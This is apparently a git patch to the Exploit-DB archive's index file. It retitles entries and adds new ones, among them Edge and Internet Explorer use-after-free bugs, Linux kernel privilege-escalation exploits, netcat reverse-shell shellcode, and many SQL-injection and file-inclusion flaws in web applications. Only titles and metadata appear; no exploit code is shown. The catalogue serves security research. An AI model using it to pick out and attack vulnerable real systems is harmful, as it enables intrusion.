From fb1dd3709fe9b3f2f67a7aba042e5f88d2811042 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Thu, 8 Dec 2016 05:01:21 +0000 Subject: [PATCH] DB: 2016-12-08 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 12 new exploits vsftpd 2.0.5 - (CWD) Authenticated Remote Memory Consumption Exploit vsftpd 2.0.5 - 'CWD' Authenticated Remote Memory Consumption XChat - Heap Overflow Denial of Service XChat 2.8.9 - Heap Overflow Denial of Service Adobe Photoshop CC & Bridge CC - '.png' File Parsing Memory Corruption (1) Adobe Photoshop CC / Bridge CC - '.png' File Parsing Memory Corruption (1) glibc - getaddrinfo Stack Based Buffer Overflow (1) glibc - 'getaddrinfo' Stack Based Buffer Overflow (PoC) Microsoft Edge - JSON.parse Info Leak Android - IOMXNodeInstance::enableNativeBuffers Unchecked Index Microsoft Edge - CMarkup::Ensure­Delete­CFState Use-After-Free (MS15-125) Microsoft Internet Explorer 9 - CDoc::Execute­Script­Uri Use-After-Free (MS13-009) Microsoft Edge - CBase­Scriptable::Private­Query­Interface Memory Corruption (MS16-068) Windows 10 x86/x64 WLAN AutoConfig - Denial of Service (POC) Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation (1) Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation (2) Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Microsoft PowerShell - XML External Entity Injection XChat 2.8.7b - (URI Handler) Remote Code Execution (Internet Explorer 6/7' XChat 2.8.7b - 'URI Handler' Remote Code Execution (Internet Explorer 6/7) Android - Inter-Process munmap with User-Controlled Size in android.graphics.Bitmap glibc - getaddrinfo Stack Based Buffer Overflow (2) glibc - 'getaddrinfo' Stack Based Buffer Overflow Microsoft Internet Explorer jscript9 - Java­Script­Stack­Walker Memory Corruption (MS15-056) Linux/x86 - Netcat (-e option disabled) Reverse Shell Shellcode (180 bytes) Gravity Board X 
1.1 - (csscontent) Remote Code Execution Gravity Board X 1.1 - 'csscontent' Parameter Remote Code Execution Mambo Component 'com_extcalendar' 2.0 - Remote File Inclusion Mambo Component ExtCalendar 2.0 - Remote File Inclusion Mambo Component com_babackup 1.1 - File Inclusion Mambo Component bigAPE-Backup 1.1 - File Inclusion E-Smart Cart 1.0 - 'Product_ID' SQL Injection E-Smart Cart 1.0 - 'Product_ID' Parameter SQL Injection Joomla! / Mambo Component 'com_swmenupro' 4.0 - Remote File Inclusion Joomla! / Mambo Component SWmenu 4.0 - Remote File Inclusion Joomla! / Mambo Component 'com_thopper' 1.1 - Remote File Inclusion Joomla! / Mambo Component Taskhopper 1.1 - Remote File Inclusion Joomla! / Mambo Component 'com_articles' 1.1 - Remote File Inclusion Joomla! / Mambo Component New Article 1.1 - Remote File Inclusion Cartweaver - 'Details.cfm ProdID' SQL Injection Cartweaver 2.16.11 - 'ProdID' Parameter SQL Injection Joomla! / Mambo Component 'com_rsgallery' 2.0b5 - 'catid' SQL Injection Joomla! 
/ Mambo Component rsgallery 2.0b5 - 'catid' Parameter SQL Injection xeCMS 1.x - (view.php list) Remote File Disclosure xeCMS 1.x - 'view.php' Remote File Disclosure Mambo Component 'com_portfolio' 1.0 - 'categoryId' SQL Injection Mambo Component Portfolio Manager 1.0 - 'categoryId' Parameter SQL Injection Easy-Clanpage 2.2 - 'id' SQL Injection Easy-Clanpage 2.2 - 'id' Parameter SQL Injection JAMM CMS - 'id' Blind SQL Injection Gravity Board X 2.0 Beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities JAMM CMS - 'id' Parameter Blind SQL Injection Gravity Board X 2.0 Beta - SQL Injection / Cross-Site Scripting GLLCTS2 <= 4.2.4 - (login.php detail) SQL Injection Butterfly ORGanizer 2.0.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities GLLCTS2 <= 4.2.4 - 'detail' Parameter SQL Injection Butterfly ORGanizer 2.0.0 - SQL Injection / Cross-Site Scripting Mambo Component 'com_galleries' 1.0 - 'aid' Parameter SQL Injection Mambo Component Galleries 1.0 - 'aid' Parameter SQL Injection Easy-Clanpage 3.0b1 - (section) Local File Inclusion WebChamado 1.1 - (tsk_id) SQL Injection Pre News Manager 1.0 - (index.php id) SQL Injection Pre Ads Portal 2.0 - SQL Injection Easy-Clanpage 3.0b1 - 'section' Parameter Local File Inclusion WebChamado 1.1 - 'tsk_id' Parameter SQL Injection Pre News Manager 1.0 - 'id' Parameter SQL Injection Pre ADS Portal 2.0 - SQL Injection GLLCTS2 - 'listing.php sort' Blind SQL Injection GLLCTS2 - 'sort' Parameter Blind SQL Injection Contenido 4.8.4 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities Contenido 4.8.4 - Remote File Inclusion / Cross-Site Scripting PHPMyCart - 'shop.php cat' SQL Injection SHOUTcast Admin Panel 2.0 - (page) Local File Inclusion Cartweaver 3 - (prodId) Blind SQL Injection DIY - (index_topic did) Blind SQL Injection PHPMyCart 1.3 - 'cat' Parameter SQL Injection SHOUTcast Admin Panel 2.0 - 'page' Parameter Local File Inclusion Cartweaver 3 - 'prodId' Parameter Blind SQL 
Injection DIY - 'did' Parameter Blind SQL Injection ezcms 1.2 - (Blind SQL Injection / Authentication Bypass) Multiple Vulnerabilities PHPEasyNews 1.13 RC2 - (POST) SQL Injection ezcms 1.2 - Blind SQL Injection / Authentication Bypass PHPEasyNews 1.13 RC2 - 'POST' Parameter SQL Injection Devalcms 1.4a - (currentfile) Local File Inclusion Devalcms 1.4a - 'currentfile' Parameter Local File Inclusion IPTBB 0.5.6 - (index.php act) Local File Inclusion IPTBB 0.5.6 - 'act' Parameter Local File Inclusion Mambo Component 'articles' - 'artid' Parameter Blind SQL Injection Mambo Component Articles - 'artid' Parameter Blind SQL Injection Mambo Component 'com_n-gallery' - Multiple SQL Injections Mambo Component N-Gallery - Multiple SQL Injections devalcms 1.4a - Cross-Site Scripting / Remote Code Execution Devalcms 1.4a - Cross-Site Scripting / Remote Code Execution PHP JOBWEBSITE PRO - (Authentication Bypass) SQL Injection PHP JOBWEBSITE PRO - Authentication Bypass Pre ADS Portal 2.0 - (Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities Pre ADS Portal 2.0 - Authentication Bypass / Cross-Site Scripting Mambo Component 'com_n-forms' - 'form_id' Parameter Blind SQL Injection Mambo Component n-form - 'form_id' Parameter Blind SQL Injection Pre Job Board - (Authentication Bypass) SQL Injection Pre Job Board - Authentication Bypass Butterfly ORGanizer 2.0.1 - (view.php id) SQL Injection Butterfly ORGanizer 2.0.1 - 'id' Parameter SQL Injection facil-cms 0.1rc2 - Multiple Vulnerabilities Facil-CMS 0.1RC2 - Multiple Vulnerabilities Family Connections CMS 1.9 - (member) SQL Injection Family Connections CMS 1.9 - SQL Injection Mambo Component 'com_hestar' - SQL Injection Mambo Component Hestar - SQL Injection Joomla! / Mambo Component 'com_tupinambis' - SQL Injection Joomla! / Mambo Component Tupinambis - SQL Injection Joomla! / Mambo Component 'com_ezine' 2.1 - Remote File Inclusion Joomla! 
/ Mambo Component D4J eZine 2.1 - Remote File Inclusion Mambo Component 'com_materialsuche' 1.0 - SQL Injection Mambo Component Material Suche 1.0 - SQL Injection Pre ADS Portal - 'cid' SQL Injection Pre ADS Portal - 'cid' Parameter SQL Injection Pre News Manager - (nid) SQL Injection Pre News Manager - 'nid' Parameter SQL Injection Mambo Component 'com_akogallery' - SQL Injection Mambo Component AkoGallery - SQL Injection Mambo Component 'com_mambads' - SQL Injection Mambo Component MambAds - SQL Injection Facil-CMS - (Local File Inclusion / Remote File Inclusion) Facil-CMS 0.1RC2 - Local / Remote File Inclusion AskMe Pro 2.1 - (que_id) SQL Injection Alstrasoft AskMe Pro 2.1 - 'que_id' Parameter SQL Injection Pre Job Board Pro - SQL Injection Authentication Bypass Pre Job Board Pro - Authentication Bypass DiY-CMS 1.0 - Multiple Remote File Inclusion DIY-CMS 1.0 - Multiple Remote File Inclusion Alstrasoft AskMe Pro 2.1 - (forum_answer.php?que_id) SQL Injection Alstrasoft AskMe Pro 2.1 - (profile.php?id) SQL Injection Alstrasoft AskMe Pro 2.1 - 'profile.php' SQL Injection Pre Ads Portal - SQL Bypass Pre ADS Portal - Authentication Bypass Family Connections CMS 2.3.2 - (POST) Persistent Cross-Site Scripting / XML Injection Family Connections CMS 2.3.2 - Persistent Cross-Site Scripting / XML Injection Family Connections CMS 2.5.0 / 2.7.1 - (less.php) Remote Command Execution Family Connections CMS 2.5.0 / 2.7.1 - 'less.php' Remote Command Execution Family Connections CMS - 'less.php' Remote Command Execution (Metasploit) Family Connections CMS 2.7.1 - 'less.php' Remote Command Execution (Metasploit) Gravity Board X 1.1 - DeleteThread.php Cross-Site Scripting Clever Copy 3.0 - Connect.INC Information Disclosure Clever Copy 3.0 - 'Connect.INC' Information Disclosure Cartweaver 2.16.11 - Results.cfm category Parameter SQL Injection Cartweaver 2.16.11 - Details.cfm ProdID Parameter SQL Injection Cartweaver 2.16.11 - 'Results.cfm' SQL Injection Mambo Component 
'lmtg_myhomepage' 1.2 - Multiple Remote File Inclusion Mambo Component 'com_rssxt' 1.0 - 'MosConfig_absolute_path' Parameter Multiple Remote File Inclusion Mambo Component LMTG Myhomepage 1.2 - Multiple Remote File Inclusion Mambo Component Rssxt 1.0 - 'MosConfig_absolute_path' Parameter Multiple Remote File Inclusion Mambo Component 'com_admin-copy_module' - 'MosConfig_absolute_path' Parameter Remote File Inclusion Mambo Component Display MOSBot Manager - 'MosConfig_absolute_path' Parameter Remote File Inclusion Joomla! / Mambo Component 'com_comprofiler' 1.0 - 'class.php' Remote File Inclusion Joomla! / Mambo Component Comprofiler 1.0 - 'class.php' Remote File Inclusion Joomla! / Mambo Component 'com_sg' - 'pid' Parameter SQL Injection Joomla! / Mambo Component com_sg - 'pid' Parameter SQL Injection Joomla! / Mambo Component 'com_salesrep' - 'rid' Parameter SQL Injection Joomla! / Mambo Component com_salesrep - 'rid' Parameter SQL Injection Joomla! / Mambo Component 'com_filebase' - 'filecatid' Parameter SQL Injection Joomla! / Mambo Component 'com_scheduling' - 'id' Parameter SQL Injection Joomla! / Mambo Component Filebase - 'filecatid' Parameter SQL Injection Joomla! / Mambo Component com_scheduling - 'id' Parameter SQL Injection Joomla! / Mambo Component 'com_profile' - 'oid' Parameter SQL Injection Joomla! / Mambo Component com_profile - 'oid' Parameter SQL Injection Joomla! / Mambo Component 'com_datsogallery' 1.3.1 - 'id' Parameter SQL Injection Joomla! / Mambo Component Datsogallery 1.3.1 - 'id' Parameter SQL Injection PHP JOBWEBSITE PRO - siteadmin/forgot.php adname Parameter SQL Injection PHP JOBWEBSITE PRO - siteadmin/forgot.php Multiple Parameter Cross-Site Scripting PHP JOBWEBSITE PRO - 'adname' Parameter SQL Injection PHP JOBWEBSITE PRO - 'forgot.php' Cross-Site Scripting Joomla! / Mambo Component 'com_gigcal' 1.0 - 'banddetails.php' SQL Injection Joomla! 
/ Mambo Component gigCalendar 1.0 - 'banddetails.php' SQL Injection Conkurent PHPMyCart 1.3 - Cross-Site Scripting / Authentication Bypass PHPMyCart 1.3 - Cross-Site Scripting / Authentication Bypass Mambo Component 'com_docman' 1.3.0 - Multiple SQL Injection Mambo Component Docman 1.3.0 - Multiple SQL Injection Mambo Component 'com_n-skyrslur' - Cross-Site Scripting Mambo Component N-Skyrslur - Cross-Site Scripting Mambo Component 'com_n-gallery' - SQL Injection Mambo Component N-Gallery - SQL Injection Mambo Component 'com_n-press' - SQL Injection Mambo Component N-Press - SQL Injection Mambo Component 'com_n-frettir' - SQL Injection Mambo Component 'com_n-myndir' - SQL Injection Mambo Component N-Frettir - SQL Injection Mambo Component N-Myndir - SQL Injection AbanteCart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities Edge SkateShop - Authentication bypass AbanteCart 1.2.7 - Cross-Site Scripting --- files.csv | 192 +++++++++-------- platforms/android/dos/40876.txt | 169 +++++++++++++++ platforms/android/remote/40874.txt | 91 ++++++++ platforms/cfm/webapps/27854.txt | 7 - platforms/lin_x86/shellcode/40872.c | 113 ++++++++++ platforms/linux/remote/40339.py | 1 - platforms/php/webapps/14979.txt | 28 --- platforms/php/webapps/17050.txt | 2 +- platforms/php/webapps/26110.txt | 7 - platforms/php/webapps/38312.txt | 15 -- platforms/php/webapps/40877.txt | 27 +++ platforms/php/webapps/40882.txt | 44 ++++ platforms/windows/dos/40875.html | 64 ++++++ platforms/windows/dos/40878.txt | 32 +++ platforms/windows/dos/40879.html | 42 ++++ platforms/windows/dos/40880.txt | 75 +++++++ platforms/windows/dos/40883.py | 59 +++++ platforms/windows/local/40873.txt | 212 ++++++++++++++++++ platforms/windows/remote/40881.html | 322 ++++++++++++++++++++++++++++ 19 files changed, 1351 insertions(+), 151 deletions(-) create mode 100755 platforms/android/dos/40876.txt create mode 100755 platforms/android/remote/40874.txt delete mode 100755 platforms/cfm/webapps/27854.txt create 
mode 100755 platforms/lin_x86/shellcode/40872.c delete mode 100755 platforms/php/webapps/14979.txt delete mode 100755 platforms/php/webapps/26110.txt delete mode 100755 platforms/php/webapps/38312.txt create mode 100755 platforms/php/webapps/40877.txt create mode 100755 platforms/php/webapps/40882.txt create mode 100755 platforms/windows/dos/40875.html create mode 100755 platforms/windows/dos/40878.txt create mode 100755 platforms/windows/dos/40879.html create mode 100755 platforms/windows/dos/40880.txt create mode 100755 platforms/windows/dos/40883.py create mode 100755 platforms/windows/local/40873.txt create mode 100755 platforms/windows/remote/40881.html diff --git a/files.csv b/files.csv index 03a1c8685..9e65807c8 100644 --- a/files.csv +++ b/files.csv @@ -739,7 +739,7 @@ id,file,description,date,author,platform,type,port 5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0 5727,platforms/windows/dos/5727.pl,"Alt-N MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)",2008-06-02,securfrog,windows,dos,0 5749,platforms/multiple/dos/5749.pl,"Asterisk 1.2.x - (SIP channel driver / in pedantic mode) Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos,0 -5814,platforms/linux/dos/5814.pl,"vsftpd 2.0.5 - (CWD) Authenticated Remote Memory Consumption Exploit",2008-06-14,"Praveen Darshanam",linux,dos,0 +5814,platforms/linux/dos/5814.pl,"vsftpd 2.0.5 - 'CWD' Authenticated Remote Memory Consumption",2008-06-14,"Praveen Darshanam",linux,dos,0 5817,platforms/windows/dos/5817.pl,"Dana IRC 1.3 - Remote Buffer Overflow (PoC)",2008-06-14,t0pP8uZz,windows,dos,0 5843,platforms/windows/dos/5843.html,"P2P Foxy - Out of Memory Denial of Service",2008-06-17,Styxosaurus,windows,dos,0 5851,platforms/windows/dos/5851.txt,"Visual Basic Enterprise Edition SP6 - 'vb6skit.dll' Buffer Overflow (PoC)",2008-06-18,shinnai,windows,dos,0 
@@ -2074,7 +2074,7 @@ id,file,description,date,author,platform,type,port 18116,platforms/multiple/dos/18116.html,"Mozilla Firefox 8.0 - Null Pointer Dereference (PoC)",2011-11-14,0in,multiple,dos,0 18124,platforms/windows/dos/18124.py,"Thunder Kankan Player 4.8.3.840 - Stack Overflow / Denial of Service",2011-11-18,hellok,windows,dos,0 18140,platforms/windows/dos/18140.c,"Microsoft Winows 7 - Keyboard Layout Blue Screen of Death (MS10-073)",2011-11-21,instruder,windows,dos,0 -18159,platforms/linux/dos/18159.py,"XChat - Heap Overflow Denial of Service",2011-11-25,"Jane Doe",linux,dos,0 +18159,platforms/linux/dos/18159.py,"XChat 2.8.9 - Heap Overflow Denial of Service",2011-11-25,"Jane Doe",linux,dos,0 18165,platforms/windows/dos/18165.txt,"siemens automation license manager 500.0.122.1 - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 18173,platforms/windows/dos/18173.pl,"Bugbear FlatOut 2005 - Malformed .bed file Buffer Overflow",2011-11-30,Silent_Dream,windows,dos,0 
@@ -4980,14 +4980,14 @@ id,file,description,date,author,platform,type,port 39425,platforms/android/dos/39425.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption (MdConvertLine)",2016-02-08,"Google Security Research",android,dos,0 39426,platforms/multiple/dos/39426.txt,"Adobe Flash - Processing AVC Causes Stack Corruption",2016-02-08,"Google Security Research",multiple,dos,0 39428,platforms/windows/dos/39428.txt,"PotPlayer 1.6.5x - '.mp3' Crash (PoC)",2016-02-09,"Shantanu Khandelwal",windows,dos,0 -39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC & Bridge CC - '.png' File Parsing Memory Corruption (1)",2016-02-09,"Francis Provencher",windows,dos,0 +39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC / Bridge CC - '.png' File Parsing Memory Corruption (1)",2016-02-09,"Francis Provencher",windows,dos,0 39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC & Bridge CC - '.png' File Parsing Memory Corruption (2)",2016-02-09,"Francis Provencher",windows,dos,0 39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC - '.iff' File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0 39444,platforms/windows/dos/39444.txt,"Alternate Pic View 2.150 - '.pgm' Crash (PoC)",2016-02-15,"Shantanu Khandelwal",windows,dos,0 39445,platforms/linux/dos/39445.c,"NTPd ntp-4.2.6p5 - ctl_putdata() Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0 39447,platforms/windows/dos/39447.py,"Network Scanner 4.0.0.0 - SEH Crash (PoC)",2016-02-15,INSECT.B,windows,dos,0 39452,platforms/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,windows,dos,0 -39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack Based Buffer Overflow (1)",2016-02-16,"Google Security Research",linux,dos,0 +39454,platforms/linux/dos/39454.txt,"glibc - 'getaddrinfo' Stack Based Buffer Overflow (PoC)",2016-02-16,"Google Security Research",linux,dos,0 
39460,platforms/multiple/dos/39460.txt,"Adobe Flash - Out-of-Bounds Image Read",2016-02-17,"Google Security Research",multiple,dos,0 39461,platforms/multiple/dos/39461.txt,"Adobe Flash - textfield Constructor Type Confusion",2016-02-17,"Google Security Research",multiple,dos,0 39462,platforms/multiple/dos/39462.txt,"Adobe Flash - Sound.loadPCMFromByteArray Dangling Pointer",2016-02-17,"Google Security Research",multiple,dos,0 
@@ -5288,6 +5288,12 @@ id,file,description,date,author,platform,type,port 40844,platforms/windows/dos/40844.html,"Microsoft Internet Explorer 10 - MSHTML 'CEdit­Adorner::Detach' Use-After-Free (MS13-047)",2016-11-28,Skylined,windows,dos,0 40845,platforms/windows/dos/40845.txt,"Microsoft Internet Explorer 8/9/10/11 - MSHTML 'DOMImplementation' Type Confusion (MS16-009)",2016-11-28,Skylined,windows,dos,0 40866,platforms/linux/dos/40866.py,"NetCat 0.7.1 - Denial of Service",2016-12-05,n30m1nd,linux,dos,0 +40875,platforms/windows/dos/40875.html,"Microsoft Edge - JSON.parse Info Leak",2016-12-06,"Google Security Research",windows,dos,0 +40876,platforms/android/dos/40876.txt,"Android - IOMXNodeInstance::enableNativeBuffers Unchecked Index",2016-12-06,"Google Security Research",android,dos,0 +40878,platforms/windows/dos/40878.txt,"Microsoft Edge - CMarkup::Ensure­Delete­CFState Use-After-Free (MS15-125)",2016-12-06,Skylined,windows,dos,0 +40879,platforms/windows/dos/40879.html,"Microsoft Internet Explorer 9 - CDoc::Execute­Script­Uri Use-After-Free (MS13-009)",2016-12-06,Skylined,windows,dos,0 +40880,platforms/windows/dos/40880.txt,"Microsoft Edge - CBase­Scriptable::Private­Query­Interface Memory Corruption (MS16-068)",2016-12-06,Skylined,windows,dos,0 +40883,platforms/windows/dos/40883.py,"Windows 10 x86/x64 WLAN AutoConfig - Denial of Service (POC)",2016-12-06,"Jeremy Brown",windows,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 
@@ -6578,7 +6584,7 @@ id,file,description,date,author,platform,type,port 15692,platforms/windows/local/15692.py,"Video Charge Studio 2.9.5.643 - '.vsc' Buffer Overflow (SEH)",2010-12-06,"xsploited security",windows,local,0 15693,platforms/windows/local/15693.html,"Viscom VideoEdit Gold ActiveX 8.0 - Remote Code Execution",2010-12-06,Rew,windows,local,0 15696,platforms/windows/local/15696.txt,"Alice 2.2 - Arbitrary Code Execution",2010-12-06,Rew,windows,local,0 -15704,platforms/linux/local/15704.c,"Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation (1)",2010-12-07,"Dan Rosenberg",linux,local,0 +15704,platforms/linux/local/15704.c,"Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0 15706,platforms/windows/local/15706.txt,"Winamp 5.6 - Arbitrary Code Execution in MIDI Parser",2010-12-08,"Kryptos Logic",windows,local,0 15745,platforms/linux/local/15745.txt,"IBM Tivoli Storage Manager (TSM) - Privilege Escalation",2010-12-15,"Kryptos Logic",linux,local,0 15727,platforms/windows/local/15727.py,"FreeAmp 2.0.7 - '.m3u' Buffer Overflow",2010-12-11,zota,windows,local,0 
@@ -6792,7 +6798,7 @@ id,file,description,date,author,platform,type,port 17745,platforms/windows/local/17745.pl,"DVD X Player 5.5 Professional - '.plf' Universal Buffer Overflow",2011-08-29,"D3r K0n!G",windows,local,0 17754,platforms/windows/local/17754.c,"DVD X Player 5.5.0 Pro / Standard - Universal Exploit (ASLR + DEP Bypass)",2011-08-30,sickness,windows,local,0 17770,platforms/windows/local/17770.rb,"DVD X Player 5.5 - '.plf' Playlist Buffer Overflow (Metasploit)",2011-09-01,Metasploit,windows,local,0 -17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation (2)",2011-09-05,"Jon Oberheide",linux,local,0 +17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation",2011-09-05,"Jon Oberheide",linux,local,0 17777,platforms/windows/local/17777.rb,"Apple QuickTime - PICT PnSize Buffer Overflow (Metasploit)",2011-09-03,Metasploit,windows,local,0 17780,platforms/windows/local/17780.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow (ASLR Bypass) (1)",2011-09-05,blake,windows,local,0 17783,platforms/windows/local/17783.pl,"ZipX 1.71 - '.ZIP' File Buffer Overflow",2011-09-05,"C4SS!0 G0M3S",windows,local,0 
@@ -8677,6 +8683,7 @@ id,file,description,date,author,platform,type,port 40863,platforms/windows/local/40863.txt,"Microsoft Event Viewer 1.0 - XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0 40864,platforms/windows/local/40864.txt,"Microsoft MSINFO32.EXE 6.1.7601 - '.NFO' XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0 40865,platforms/windows/local/40865.txt,"Apache CouchDB 2.0.0 - Local Privilege Escalation",2016-12-05,hyp3rlinx,windows,local,0 +40873,platforms/windows/local/40873.txt,"Microsoft PowerShell - XML External Entity Injection",2016-12-06,hyp3rlinx,windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 
@@ -9649,7 +9656,7 @@ id,file,description,date,author,platform,type,port 5778,platforms/windows/remote/5778.html,"Black Ice Software Annotation Plugin - (BiAnno.ocx) Buffer Overflow (2)",2008-06-10,shinnai,windows,remote,0 5790,platforms/multiple/remote/5790.txt,"SNMPv3 - HMAC Validation error Remote Authentication Bypass",2008-06-12,"Maurizio Agazzini",multiple,remote,161 5793,platforms/windows/remote/5793.html,"muvee autoProducer 6.1 - 'TextOut.dll' ActiveX Remote Buffer Overflow",2008-06-12,Nine:Situations:Group,windows,remote,0 -5795,platforms/windows/remote/5795.html,"XChat 2.8.7b - (URI Handler) Remote Code Execution (Internet Explorer 6/7'",2008-06-13,securfrog,windows,remote,0 +5795,platforms/windows/remote/5795.html,"XChat 2.8.7b - 'URI Handler' Remote Code Execution (Internet Explorer 6/7)",2008-06-13,securfrog,windows,remote,0 5827,platforms/windows/remote/5827.cpp,"Alt-N SecurityGateway 1.00-1.01 - Remote Stack Overflow",2008-06-15,Heretic2,windows,remote,4000 5926,platforms/hardware/remote/5926.txt,"Linksys WRT54G (Firmware 1.00.9) - Security Bypass Vulnerabilities (2)",2008-06-24,meathive,hardware,remote,0 6004,platforms/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote Buffer Overflow",2008-07-04,"Karol Wiesek",windows,remote,0 
@@ -13292,6 +13299,7 @@ id,file,description,date,author,platform,type,port 26075,platforms/hardware/remote/26075.txt,"MobileIron Virtual Smartphone Platform - Privilege Escalation",2013-06-10,prdelka,hardware,remote,0 26299,platforms/windows/remote/26299.c,"MultiTheftAuto 0.5 - Multiple Vulnerabilities",2005-09-26,"Luigi Auriemma",windows,remote,0 26101,platforms/linux/remote/26101.txt,"EMC Navisphere Manager 6.x - Directory Traversal / Information Disclosure Vulnerabilities",2005-08-05,anonymous,linux,remote,0 +40874,platforms/android/remote/40874.txt,"Android - Inter-Process munmap with User-Controlled Size in android.graphics.Bitmap",2016-12-06,"Google Security Research",android,remote,0 26123,platforms/multiple/remote/26123.rb,"Java - Web Start Double Quote Injection Remote Code Execution (Metasploit)",2013-06-11,Rh0,multiple,remote,0 26134,platforms/windows/remote/26134.rb,"Synactis PDF In-The-Box - ConnectToSynactic Stack Buffer Overflow (Metasploit)",2013-06-11,Metasploit,windows,remote,0 26135,platforms/multiple/remote/26135.rb,"Java Applet - Driver Manager Privileged toString() Remote Code Execution (Metasploit)",2013-06-11,Metasploit,multiple,remote,0 
@@ -14353,7 +14361,7 @@ id,file,description,date,author,platform,type,port 34461,platforms/multiple/remote/34461.py,"NRPE 2.15 - Remote Code Execution",2014-08-29,"Claudio Viviani",multiple,remote,0 34462,platforms/windows/remote/34462.txt,"Microsoft Windows Kerberos - 'Pass The Ticket' Replay Security Bypass",2010-08-13,"Emmanuel Bouillon",windows,remote,0 34478,platforms/windows/remote/34478.html,"Microsoft Internet Explorer 8 - 'toStaticHTML()' HTML Sanitization Bypass",2010-08-16,"Mario Heiderich",windows,remote,0 -40339,platforms/linux/remote/40339.py,"glibc - getaddrinfo Stack Based Buffer Overflow (2)",2016-09-06,SpeeDr00t,linux,remote,0 +40339,platforms/linux/remote/40339.py,"glibc - 'getaddrinfo' Stack Based Buffer Overflow",2016-09-06,SpeeDr00t,linux,remote,0 34500,platforms/multiple/remote/34500.html,"Flock Browser 3.0.0 - Malformed Bookmark HTML Injection",2010-08-19,Lostmon,multiple,remote,0 34507,platforms/linux/remote/34507.txt,"Nagios XI - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-19,"Adam Baldwin",linux,remote,0 34517,platforms/windows/remote/34517.rb,"Wing FTP Server - Authenticated Command Execution (Metasploit)",2014-09-01,Metasploit,windows,remote,5466 
@@ -15129,6 +15137,7 @@ id,file,description,date,author,platform,type,port 40867,platforms/hardware/remote/40867.txt,"Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities",2016-12-05,"Persian Hack Team",hardware,remote,0 40868,platforms/windows/remote/40868.py,"Dup Scout Enterprise 9.1.14 - Buffer Overflow (SEH)",2016-12-05,vportal,windows,remote,0 40869,platforms/windows/remote/40869.py,"DiskBoss Enterprise 7.4.28 - 'GET' Buffer Overflow",2016-12-05,vportal,windows,remote,0 +40881,platforms/windows/remote/40881.html,"Microsoft Internet Explorer jscript9 - Java­Script­Stack­Walker Memory Corruption (MS15-056)",2016-12-06,Skylined,windows,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 
